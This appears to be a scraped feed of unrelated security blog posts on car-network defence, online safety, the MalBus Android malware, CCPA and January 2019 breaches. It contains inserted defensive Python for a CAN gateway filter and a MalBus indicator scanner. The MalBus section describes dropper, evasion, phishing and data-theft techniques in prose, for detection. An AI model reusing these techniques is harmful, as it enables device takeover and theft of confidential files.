      As alarming as this sounds, with the frightening prospect of complete loss of control of a vehicle, there is reason to think that the threat can be managed effectively. Numerous companies are already researching and developing ways to make cars resistant to attack, using a multi-layered defence made up of several security controls, each installed at a different level of the vehicle's architecture.

      Individual systems and ECUs can be hardened against attack. One level up from that, software protection is being developed to safeguard the vehicle's entire internal network. In the layer above that, there are already solutions in place to defend the points where ECUs connect to external sources. This is perhaps the most critical layer, since it is the boundary between internal and external communications. The final layer of security comes from the cloud, where threats can be identified and blocked before they ever reach a car.
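
      One concrete instance of the gateway layer just described, as an added example rather than anything from the article or a vendor product: a policy filter sitting between the infotainment bus and a safety-critical bus that forwards only allow-listed CAN identifiers, checks each one's expected payload length, and rate-limits each identifier so a compromised peripheral ECU can neither inject brake or engine messages nor flood the bus. The identifiers, lengths and limits are assumed for illustration, and the traffic is constructed.

```python
"""Toy CAN gateway policy between an infotainment bus and a safety-critical
bus. Added example, not vendor code; identifiers, lengths and limits are
assumed for illustration."""
from collections import deque
from dataclasses import dataclass


@dataclass(frozen=True)
class CanFrame:
    can_id: int   # 11-bit standard identifier
    data: bytes   # 0 to 8 bytes of payload
    t_ms: int     # receive timestamp in milliseconds


# Allow-list: identifier -> (expected payload length, max frames per second).
# Anything not listed is dropped, so a compromised infotainment ECU cannot
# inject brake, steering or engine messages. IDs are assumed.
INFOTAINMENT_TO_CHASSIS = {
    0x3F1: (2, 10),  # cabin temperature request, 2 bytes, 10 Hz
    0x3F2: (1, 5),   # door unlock request, 1 byte, 5 Hz
}


class Gateway:
    def __init__(self, policy=INFOTAINMENT_TO_CHASSIS, window_ms=1000):
        self.policy = policy
        self.window_ms = window_ms
        self._recent = {can_id: deque() for can_id in policy}
        self.dropped = []  # (frame, reason): what an in-vehicle IDS would log

    def allow(self, frame):
        """Return True if the frame may cross to the chassis bus."""
        rule = self.policy.get(frame.can_id)
        if rule is None:
            return self._drop(frame, "id not allow-listed")
        length, max_per_s = rule
        if len(frame.data) != length:
            return self._drop(frame, "unexpected length")
        window = self._recent[frame.can_id]
        while window and frame.t_ms - window[0] >= self.window_ms:
            window.popleft()  # forget frames outside the sliding window
        if len(window) >= max_per_s:
            return self._drop(frame, "rate limit exceeded")
        window.append(frame.t_ms)
        return True

    def _drop(self, frame, reason):
        self.dropped.append((frame, reason))
        return False


def forward(gateway, frames):
    """Frames, in order, that the gateway passes through."""
    return [f for f in frames if gateway.allow(f)]


if __name__ == "__main__":
    # Constructed traffic: one legitimate request, an injected frame with an
    # assumed brake-command ID, a malformed request, then a flood.
    gw = Gateway()
    traffic = [CanFrame(0x3F1, b"\x01\x02", 0),
               CanFrame(0x0A5, b"\x00" * 8, 1),
               CanFrame(0x3F2, b"\x01\x02\x03", 2)]
    traffic += [CanFrame(0x3F2, b"\x01", 10 + i) for i in range(6)]
    print(len(forward(gw, traffic)))  # 6
    print([reason for _, reason in gw.dropped])
```

      Classic CAN carries no sender authentication, so the gateway cannot tell a genuine infotainment message from one injected by a compromised ECU on the same bus; the allow-list and rate limit bound the damage rather than prove origin. The dropped list is the signal the cloud layer would want to see, since a burst of "id not allow-listed" drops from one vehicle is a strong indication that a peripheral ECU has been taken over.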

      The Cyber Security Nightmare
      If you ask an average person in the UK what the biggest problem associated with driverless cars is, they'd probably cite safety. Industry experts, however, feel that once the technology has been worked out there will probably be fewer highway accidents and that driving safety will actually improve. The nightmare, though, is the threat that always exists when anything is connected to the Internet, and that will always be cause for concern.

      Safer Internet Day 2019 – Together for a Better Internet

      What You Can Do Today to Help Create a Better Internet

       

      Today is Safer Internet Day (SID) – an annual worldwide event to encourage us all to work together to create a better internet. Celebrated globally in over 130 countries, SID is an opportunity for millions of people worldwide to come together to inspire positive change and raise awareness about the importance of online safety.

      The theme for 2019 is: ‘Together for a Better Internet’ which I believe is a timely reminder of the importance of us all working together if we are serious about making the internet a safer place. Whether we are parents, carers, teachers or just avid users, we all have a part to play.

      The 4R’s of Online Safety

      In order to make a positive change to our online world, this year we are being encouraged to focus on four critical skills that many experts believe will help us all (especially our kids) better navigate the internet and create a more positive online environment. Let's call them the 4R's of online safety: Respect, Responsibility, Reasoning and Resilience. So, here is my advice on what we can do to try and incorporate these four important skills into our family's digital lives.

      1. Respect – ‘I treat myself and others the way I like to be treated’

      I firmly believe that having respect for others online is critical if we are going to foster a safer and more supportive internet for our children and future generations. While many parents realise that our constant reminders about the importance of good manners and respect must also now be extended to include the online world, not everyone is on the same page.

      Keyboard warriors who fire off abusive comments online, or harass and troll others, clearly have no notion of online respect. Online actions can have serious real-world implications. In fact, online actions can often have more significant implications, as the dialogue is not contained to a few people but witnessed by everyone's online friends, which could stretch into the thousands. Such public exchanges then create the opportunity for commentary which often further magnifies the hurt and fallout.

      It is therefore essential that we have very direct conversations with our children about what is and isn’t appropriate online. And if there is even any confusion, always revert to one of my favourite lessons from my Sunday School days: treat others how you would like to be treated yourself.

      2. Responsibility – ‘I am accountable for my actions and I take a stand when I feel something is wrong’

      In my opinion, teaching our kids online responsibility is another important step in making the internet a better place. Ensuring our kids understand that they are not only responsible but accountable for their behaviour is essential. If they harass or bully others online, or are involved in sending inappropriate pics, there are consequences, which could quite possibly include involvement of the police.

      But being responsible online also means getting involved if you feel something isn’t right. Whether a mate is on the receiving end of online harassment or a cruel joke, getting involved and telling the perpetrator that their behaviour ‘isn’t cool’ is essential.

      3. Reasoning – ‘I question what is real’

      Teaching our kids to think critically is an essential survival skill in our content-driven online world. We need our kids to question, analyse and verify online content. They need to be able to identify reputable and credible sources and think carefully before they share and digest information.

      The best thing we can do as parents is challenge our kids and get them thinking! If for example, your child is researching online for a school assignment then get them thinking. Ask them what agenda the author of the article has. Ask them whether there is a counter argument to the one laid out in the article. Ask them whether the source sharing the information is trustworthy. The aim is to teach them to question and not take anything they find online at face value.

      4. Resilience – ‘I get back up from tough situations’

      Unfortunately, the chances that your child will experience some challenges online are quite high. Whether someone posts a mean comment, they are harassed or, worst case, cyberbullied, these nasty online interactions can really hurt.

      Ensuring your kids know that they can come to you about any issue they experience is essential. And you need to repeat this to them regularly, so they don’t forget! And if your child does come to you with a problem they experienced online, the worst thing you can do is threaten to disconnect them. If you do this, I guarantee you that they will never share anything else with you again.

      In 2014, Parent Zone, one of the UK’s leading family digital safety organisations collaborated with the Oxford Internet Institute to examine ways to build children’s online resilience. The resulting report, A Shared Responsibility: Building Children’s Online Resilience, showed that unconditional love and respect from parents, a good set of digital skills plus the opportunity for kids to take risks and develop strategies in the online world – without being overly micro-managed by their parents – were key to building online resilience.

      So, love them, educate them and give them some independence so they can start to take some small risks online and start developing resilience.

      What Can You Do this Safer Internet Day?

      Why not pledge to make one small change to help make the internet a better place this Safer Internet Day? Whether it’s modelling online respect, reminding your kids of their online responsibilities, challenging them to demonstrate reasoning when assessing online content or working with them to develop online resilience, just a few small steps can make a positive change.

      The post Safer Internet Day 2019 – Together for a Better Internet appeared first on McAfee Blogs.

      MalBus: Popular South Korean Bus App Series in Google Play Found Dropping Malware After 5 Years of Development

      McAfee’s Mobile Research team recently learned of a new malicious Android application masquerading as a plugin for a series of transportation apps developed by a South Korean developer. The series provides a range of information for each region of South Korea, such as bus stop locations and bus arrival times. There are four apps in the series, three of them available on Google Play since 2013 and the fourth from around 2017. All four apps have since been removed from Google Play, while the fake plugin itself was never uploaded to the store. While analyzing the fake plugin, we looked for initial downloaders and additional payloads and discovered one specific version of each app in the series (all uploaded on the same date) that dropped malware onto the devices it was installed on, which explains the apps' removal from Google Play after five years of development.

      Figure 1. Cached Google Play page of Daegu Bus application, one of the apps in series

      When the malicious version of the transportation app is installed, it downloads an additional payload from hacked web servers; that payload includes the fake plugin we originally acquired. Once the fake plugin is downloaded and installed, it does nothing a plugin would do: it installs a trojan on the device and tries to phish the user's Google account password so as to take complete control of the device. Interestingly, the malware uses a native library to take over the device and then deletes that library to evade detection. It borrows the names of popular South Korean services such as Naver, KakaoTalk, Daum and SKT. According to our telemetry data, the number of infected devices was quite low, suggesting that the final payload was delivered only to a small group of targets.

      The Campaign

      The following diagram explains the overall flow from malware distribution to device infection.

      Figure 2. Device infection process

      When the malicious version of the transportation app is installed, it checks whether the fake plugin is already installed and, if not, downloads from the server and installs it. After that, it downloads and executes an additional native trojan binary which is similar to the trojan which is dropped by the fake plugin. After everything is done, it connects with the C2 servers and handles received commands.

      Initial Downloader

      The following table shows information about the malicious version of each transportation app in the series. As the Google Play install counts show, these apps were downloaded onto many devices.

      Unlike the clean version of the app, the malicious version contains a native library named “libAudio3.0.so”.

      Figure 3. Transportation app version with malicious native library embedded

      In the BaseMainActivity class of the app, it loads the malicious library and calls startUpdate() and updateApplication().

      Figure 4. Malicious library being loaded and executed in the app

      startUpdate() checks whether the app is correctly installed by checking for the existence of a specific flag file named “background.png” and whether the fake plugin is installed already. If the device is not already infected, the fake plugin is downloaded from a hacked web server and installed after displaying a toast message to the victim. updateApplication() downloads a native binary from the same hacked server and dynamically loads it. The downloaded file (saved as libSound1.1.so) is then deleted after being loaded into memory and, finally, it executes an exported function which acts as a trojan. As previously explained, this file is similar to the file dropped by the fake plugin which is discussed later in this post.

      Figure 5. Additional payload download servers

      Fake Plugin

      The fake plugin is downloaded from a hacked web server with a “.mov” file extension so that it looks like a media file. When it is installed and executed, it displays a toast message (in Korean) saying the plugin was installed successfully and calls a native function named playMovie(); the icon for the fake plugin soon disappears from the screen. The native function, implemented in LibMovie.so stored inside the asset folder, drops a malicious trojan into the running app's directory under the name libpng.2.1.so. The trojan is embedded in LibMovie.so XOR-encoded and is decoded at run time. After setting permissions on the dropped file, the address of its exported function “Libfunc” is retrieved dynamically using dlsym(), the dropped binary is deleted from the filesystem to avoid detection, and finally Libfunc is executed.

      Figure 6. Toast message when malware is installed

      In a separately forked process, it tries to access the “naver.property” file on an installed SD card, if there is one, and if that succeeds it starts the “.KaKaoTalk” activity, which displays a Google phishing page (more on that in the next section). The overall flow of the dropper is shown in the following diagram:

      Figure 7. Execution flow of the dropper

      Following is a snippet of a manifest file showing that “.KaKaoTalk” activity is exported.

      Figure 8. Android Manifest defining “.KaKaoTalk” activity as exported

      Phishing in JavaScript

      The KakaoTalk class opens a local HTML file, javapage.html, with the email address registered on the infected device filled in automatically so that the page appears to log the user into their own account.

      Figure 9. KakaoTalk class loads malicious local html file

      The victim’s email address is inserted into the local page by a JavaScript function, setEmailAddress, once the page has finished loading, and a fake Korean Google login page is displayed:

      Figure 10. The malicious JavaScript shows crafted Google login page with user account

      The malware author attempts to abuse legitimate Google services in the following ways:

      • Steal victim’s Google account and password
      • Request password recovery for a specific account
      • Set recovery email address when creating new Google account

      An interesting element of the phishing attack is that the malware authors tried to set their own email as the recovery address on Google’s legitimate services. For example, when a user clicks on the new Google account creation link in the phishing page, the crafted link is opened with the malware author’s email address as a parameter of RecoveryEmailAddress.

      Figure 11. The crafted JavaScript attempts to set recovery email address for new Google account creation.

      Fortunately for end users, none of the above malicious attempts are successful. The parameter with the malware author’s email address is simply ignored at the account creation stage.

      Trojan

      In addition to displaying the Google phishing page, once the “Libfunc” function of the trojan (dropped by the fake plugin or downloaded from the server) is executed, the device is fully compromised. The trojan receives commands from the following hardcoded list of C2 servers; its main functionality is implemented in a function called “doMainProc()”. Note that there are a few variants of the trojan with slightly different functionality but, overall, they are much the same.

      Figure 12. Hardcoded list of C2 servers

      The geolocation of the hardcoded C2 servers looks like the following:

      Figure 13. Location of C2 Servers

      Inside doMainProc(), the trojan receives commands from the C2 server and calls appropriate handlers. Part of the switch block below gives us an idea of what type of commands this trojan supports.

      Figure 14. Subset of command handlers implemented in the dropped trojan.

      As the handlers show, the trojan has the functionality typical of its kind: downloading, uploading and deleting files on the device, leaking information to a remote server, and so on. The following table explains the supported C2 commands:

      Figure 15. C2 Commands

      Before entering the command handling loop, the trojan performs some initialization, such as sending device information files to the server and checking the device's UID. It enters the loop only if the UID check returns 1.

      Figure 16. Servers connected before entering command loop

      Among these commands, directory indexing is particularly important. The directory structure is saved in a file named “kakao.property” and, while indexing the given path on the device, the trojan checks file names against a list of keywords and uploads any matching file to a remote upload server. The keywords are Korean; their English translations are shown in the following table:

      Figure 17. Search file keywords

      By looking at the keywords we can anticipate that the malware authors were looking for files related to the military, politics and so on. These files are uploaded to a separate server.

      Figure 18. Keyword matching file upload server

      Conclusion

      Applications can easily trick users into installing them and then leak sensitive information. It is also not uncommon to see malware sneak onto the official Google Play store, which makes it hard for users to protect their devices. This malware was not written for ordinary phishing but for very targeted attacks, searching victims' devices for files related to the military and politics, most likely in order to exfiltrate confidential information. Users should install only applications they fully trust, even when those come from trusted sources.

      McAfee Mobile Security detects this threat as Android/MalBus and alerts mobile users if it is present, while protecting them from any data loss. For more information about McAfee Mobile Security, visit https://www.mcafeemobilesecurity.com.

      Hashes (SHA-256)

      Initial Downloader (APK)
      • 19162b063503105fdc1899f8f653b42d1ff4fcfcdf261f04467fad5f563c0270
      • bed3e665d2b5fd53aab19b8a62035a5d9b169817adca8dfb158e3baf71140ceb
      • 3252fbcee2d1aff76a9f18b858231adb741d4dc07e803f640dcbbab96db240f9
      • e71dc11e8609f6fd84b7af78486b05a6f7a2c75ed49a46026e463e9f86877801

      Fake Plugin (APK)
      • ecb6603a8cd1354c9be236a3c3e7bf498576ee71f7c5d0a810cb77e1138139ec
      • b8b5d82eb25815dd3685630af9e9b0938bccecb3a89ce0ad94324b12d25983f0

      Trojan (additional payload)
      • b9d9b2e39247744723f72f63888deb191eafa3ffa137a903a474eda5c0c335cf
      • 12518eaa24d405debd014863112a3c00a652f3416df27c424310520a8f55b2ec
      • 91f8c1f11227ee1d71f096fd97501c17a1361d71b81c3e16bcdabad52bfa5d9f
      • 20e6391cf3598a517467cfbc5d327a7bb1248313983cba2b56fd01f8e88bb6b9
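
      The indicators scattered through the analysis above (the libAudio3.0.so loader in the trojanised app versions, the LibMovie.so asset in the fake plugin, the exported “.KaKaoTalk” activity, the run-time files such as naver.property and kakao.property, and the SHA-256 hashes listed here) can be turned into a small static check. The following is an added example, not McAfee's tooling: it matches a file's hash against the IOC list, looks for the named entries inside an APK, flags an exported KaKaoTalk activity in a decoded manifest, and matches an on-device file listing. The sample APK and manifest it builds are constructed stand-ins, and the package name in the manifest is assumed.

```python
"""Indicator checks for the MalBus samples described above. Added example,
not McAfee tooling; the sample APK and manifest below are constructed."""
import hashlib
import io
import posixpath
import xml.etree.ElementTree as ET
import zipfile

# SHA-256 values from the post's IOC list.
KNOWN_SHA256 = {
    "initial downloader": {
        "19162b063503105fdc1899f8f653b42d1ff4fcfcdf261f04467fad5f563c0270",
        "bed3e665d2b5fd53aab19b8a62035a5d9b169817adca8dfb158e3baf71140ceb",
        "3252fbcee2d1aff76a9f18b858231adb741d4dc07e803f640dcbbab96db240f9",
        "e71dc11e8609f6fd84b7af78486b05a6f7a2c75ed49a46026e463e9f86877801",
    },
    "fake plugin": {
        "ecb6603a8cd1354c9be236a3c3e7bf498576ee71f7c5d0a810cb77e1138139ec",
        "b8b5d82eb25815dd3685630af9e9b0938bccecb3a89ce0ad94324b12d25983f0",
    },
    "trojan": {
        "b9d9b2e39247744723f72f63888deb191eafa3ffa137a903a474eda5c0c335cf",
        "12518eaa24d405debd014863112a3c00a652f3416df27c424310520a8f55b2ec",
        "91f8c1f11227ee1d71f096fd97501c17a1361d71b81c3e16bcdabad52bfa5d9f",
        "20e6391cf3598a517467cfbc5d327a7bb1248313983cba2b56fd01f8e88bb6b9",
    },
}

# Archive entries the analysis ties to the malicious builds.
APK_ENTRY_INDICATORS = {
    "libAudio3.0.so": "native loader present only in the trojanised app versions",
    "LibMovie.so": "fake-plugin asset that drops the XOR-encoded trojan",
}

# Files the malware creates or looks for on the device at run time.
DEVICE_FILE_INDICATORS = {
    "background.png": "flag file the downloader uses to mark an install",
    "libSound1.1.so": "downloaded native trojan (deleted after loading)",
    "libpng.2.1.so": "trojan dropped by the fake plugin (deleted after loading)",
    "naver.property": "SD-card trigger for the phishing activity",
    "kakao.property": "directory index written by the C2 indexing command",
}

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"


def classify_digest(hexdigest):
    """Map a SHA-256 hex digest to the MalBus component it belongs to."""
    for family, hashes in KNOWN_SHA256.items():
        if hexdigest.lower() in hashes:
            return family
    return None


def classify_file(data):
    return classify_digest(hashlib.sha256(data).hexdigest())


def scan_apk(apk_bytes):
    """Return (entry, reason) for every suspicious entry in an APK (a zip)."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        for name in zf.namelist():
            base = posixpath.basename(name)
            if base in APK_ENTRY_INDICATORS:
                hits.append((name, APK_ENTRY_INDICATORS[base]))
    return hits


def exported_kakaotalk_activities(manifest_xml):
    """Names of exported activities called *KaKaoTalk in a decoded (text)
    AndroidManifest.xml, e.g. apktool output. Only an explicit
    android:exported="true" is checked, which is what Figure 8 shows."""
    root = ET.fromstring(manifest_xml)
    return [act.get(ANDROID_NS + "name", "") for act in root.iter("activity")
            if act.get(ANDROID_NS + "exported") == "true"
            and act.get(ANDROID_NS + "name", "").endswith("KaKaoTalk")]


def scan_device_listing(paths):
    """Match a list of on-device paths against the run-time indicators."""
    return [(pth, DEVICE_FILE_INDICATORS[posixpath.basename(pth)])
            for pth in paths if posixpath.basename(pth) in DEVICE_FILE_INDICATORS]


def build_sample_apk(entries):
    """Constructed stand-in for an APK: a zip with the given entry names."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name in entries:
            zf.writestr(name, b"\x00")
    return buf.getvalue()


# Constructed manifest fragment modelled on Figure 8 (package name assumed).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.fakeplugin">
  <application>
    <activity android:name=".MainActivity" android:exported="false"/>
    <activity android:name=".KaKaoTalk" android:exported="true"/>
  </application>
</manifest>"""


if __name__ == "__main__":
    apk = build_sample_apk(["classes.dex", "lib/armeabi-v7a/libAudio3.0.so",
                            "assets/LibMovie.so"])
    print(scan_apk(apk), classify_file(apk))  # two hits, None (constructed)
    print(exported_kakaotalk_activities(SAMPLE_MANIFEST))  # ['.KaKaoTalk']
```

      The AndroidManifest.xml inside a real APK is binary XML, so decode it with a tool such as apktool before passing it to exported_kakaotalk_activities(). That function also only honours an explicit android:exported="true"; on Android versions of the time an activity with an intent filter and no exported attribute is exported by default, so a production rule should treat that case as exported too. The run-time indicators matter because both libSound1.1.so and libpng.2.1.so are deleted right after being loaded, so on a live device the flag and property files are more likely to survive than the native payloads themselves.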

      The post MalBus: Popular South Korean Bus App Series in Google Play Found Dropping Malware After 5 Years of Development appeared first on McAfee Blogs.

      California Consumer Privacy Act

      This blog was written by Gerald Jones Jr.

      More sweeping privacy law changes are on the horizon as California law overhauls consumer protection and privacy rights.

      Shortly after enforcement of the European Union’s watershed General Data Protection Regulation (GDPR) began on May 25, 2018, California passed its own privacy bill, the California Consumer Privacy Act of 2018 (CCPA), in June. Passed under pressure to act or else face a more stringent ballot initiative backed by a private California resident, the CCPA broadens the scope of privacy rights for Californians. It includes data access rights and a limited private right of action, that is, the right to file a lawsuit.

      The CCPA takes effect in January 2020, with enforcement by the California Attorney General beginning no later than July 2020, and is widely regarded as the foremost privacy law in the United States. Yet the CCPA may have broader implications. The range of companies falling within the Act’s scope, not just the usual suspects in the technology industry, might pressure Congress into enacting a federal privacy regime, which would pre-empt the CCPA.

      The Act grants consumers greater control over their personally identifiable information and prods companies doing business in the state to prioritize the practice of sound data governance. Here are some key takeaways under the CCPA:

      • It impacts companies doing business in California that meet one of the following thresholds:
        • Has annual gross revenues greater than $25 million; or
        • Buys, receives, sells or shares the personal information of 50,000 or more California consumers, households or devices for monetary or other valuable consideration; or
        • Receives 50% or more of its annual revenue from selling consumer personal information.
      • “Personal information” now explicitly includes IP addresses, geolocation data, and unique identifiers such as cookies, beacons, pixel tags, browsing history, and other electronic network activity information. It also includes information that relates to households, not just individuals.
      • The California Attorney General will enforce the law, though Californians have a private right of action limited to circumstances where there is an unauthorized access to nonencrypted personal information or “disclosure of personal information because of a business failure to implement and maintain reasonable security procedures.”
      • Violators of the law are subject to civil penalties of up to $2,500 per unintentional violation (after failing to cure the violation within 30 days of receiving notice of noncompliance from the California Attorney General) and up to $7,500 per intentional violation (not acknowledging a request for data, for example) when the civil action is brought by the California Attorney General.

      What Does This All Mean?

      Regulators are working on guidance, and there is still time for amendments to the law, so things might change before it goes into effect. Residents of the European Economic Area have been exercising their data subject access rights since late May. Now Californians will join them in being able to ask what data CCPA-covered companies hold about them. The CCPA gives companies a 45-day window to respond to an individual’s request for access to or deletion of data (a Data Subject Access Request, or DSAR), in contrast to the GDPR’s one month.

      Companies may need to prepare for an increase in DSARs and implement new features to comply with the law, like providing two communication methods for consumers electing to exercise their rights (web portal, email address, toll free telephone number, or another viable mode of communication) and provide a conspicuous link on the company’s website that informs the consumer of her CCPA rights.

      The California Legislature’s reference to Cambridge Analytica makes it apparent that legislators expect businesses to exercise transparency in their consumer data use practices. Even without legislative nudging, companies are slowly recognizing value in sound privacy and data governance practices. Companies no longer see privacy as a mere compliance checkbox, but instead as a competitive advantage that simultaneously builds consumer confidence.

      We may see more changes to the California law, and we likely will see other laws come in to play both in the United States and abroad (Brazil, China, India, etc.), but companies with privacy in their DNA will have an edge over companies scrambling to meet compliance efforts.

      The post California Consumer Privacy Act appeared first on McAfee Blogs.

      Cyber Security Roundup for January 2019

      The first month of 2019 was relatively slow for cyber security in comparison with the steady stream of cyber attacks and breaches throughout 2018. On Saturday 26th January, car servicing and repair outfit Kwik Fit told customers its IT systems had been taken offline due to malware, which disrupted its ability to book in car repairs. Kwik Fit didn't provide any details about the malware, but it is fair to speculate that the outbreak was more likely caused by a general lack of security patching and anti-virus protection than by anything sophisticated.

      B&Q said it had taken action after a security researcher found and disclosed that details of B&Q's suspected store thieves were exposed online. According to Ctrlbox Information Security, the exposed records included 70,000 offender and incident logs containing:
      • the first and last names of individuals caught or suspected of stealing goods from stores
      • descriptions of the people involved, their vehicles and other incident-related information
      • the product codes of the goods involved
      • the value of the associated loss

      Hundreds of German politicians, including Chancellor Angela Merkel, had personal details stolen and published online at the start of January. A 20-year-old suspect was later arrested in connection with the disclosure. Investigators said the suspect had acted alone and had taught himself the skills he needed from online resources, having no training in computer science: yet another example of the low barrier to entry for becoming a successful and sinister hacker.

      Hackers took control of 65,000 smart TVs around the world in yet another stunt in support of YouTuber PewDiePie. A video message displayed on the vulnerable TVs read "Your Chromecast/Smart TV is exposed to the public internet and is exposing sensitive information about you!" It then encouraged victims to visit a web address before finishing with "you should also subscribe to PewDiePie".
      Hacked Smart TVs: The Dangers of Exposing Smart TVs to the Net

      The PewDiePie hackers said they had discovered a further 100,000 vulnerable devices, while Google said its products were not to blame but was reported to have fixed them anyway. In the previous month two hackers carried out a similar stunt by forcing thousands of printers to print similar messages; the BBC News website has an interesting video on the negative impact of that stunt on the hackers themselves: The PewDiePie Hackers: Could hacking printers ruin your life?

      Security company ForeScout said it had found thousands of vulnerable devices using the search engines Shodan and Censys, many of them located in hospitals and schools. Heating, ventilation and air conditioning (HVAC) systems were among those the team could have taken control of after developing its own proof-of-concept malware.

      Reddit users found they were locked out of their accounts after an apparent credential stuffing attack, in response to which Reddit forced a mass password reset. A Reddit admin said a "large group of accounts were locked down" due to "anomalous activity suggesting unauthorised access".

      Kaspersky reported that 30 million cyber attacks were carried out in the last quarter of 2018, with cyber attacks via web browsers reported as the most common method for spreading malware.

      Action Fraud issued a new warning about a convincing TV Licensing phishing email campaign making the rounds. The emails use subject lines like "correct your licensing information" and "your TV licence expires today" to convince people to open them. TV Licensing warned that it never asks for this sort of information over email.

      January saw further political pressure and media coverage about the threat posed to the UK national security by Chinese telecoms giant Huawei, I'll cover all that in a separate blog post.



      Customer Support Scams Are Popping up in Social Media Ads: How to Stay Secure

      Many of us rely on customer support websites for navigating new technology. Whether it’s installing a new piece of software or troubleshooting a computer program, we look to customer support to save the day. Unfortunately, cybercriminals are leveraging our reliance on customer support pages to access our personal information for financial gain. It appears that a malicious website is attempting to trick users into handing over their McAfee activation keys and personally identifiable information (PII) by disguising itself as the official McAfee customer support website.

      So how exactly does this cyberthreat work? First, malicious actors advertise the fake website on Twitter. If a user clicks on the ad, they are presented with a “Download McAfee” button. When the user clicks on the download button, they are redirected to a screen prompting them to enter their name, email address, contact number, and product activation key to proceed with the download. However, when the user clicks on the “Start Download” button, they are redirected to a screen stating that their download failed due to an unexpected error.


      At this point, the site owner has received the user’s personal data, which they could exploit in a variety of ways. And while this scheme may seem tricky to spot, there are a number of ways users can defend themselves from similar scams:

      • Be vigilant when clicking on social media links. Although it may be tempting to click on advertisements in your social media feed, these ads could lead to sketchy websites set up by cybercriminals. Use caution when interacting with social media ads.
      • Go straight to the source. If you come across an advertisement claiming to be from a company and the link asks for personal data, it’s best to go directly to the company’s website instead. Use the official McAfee customer support page if you require technical support or assistance with your McAfee product.
      • Use security software. A security solution like McAfee WebAdvisor can help you spot suspicious websites and protect you from accidentally clicking on malicious links.

      And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

      The post Customer Support Scams Are Popping up in Social Media Ads: How to Stay Secure appeared first on McAfee Blogs.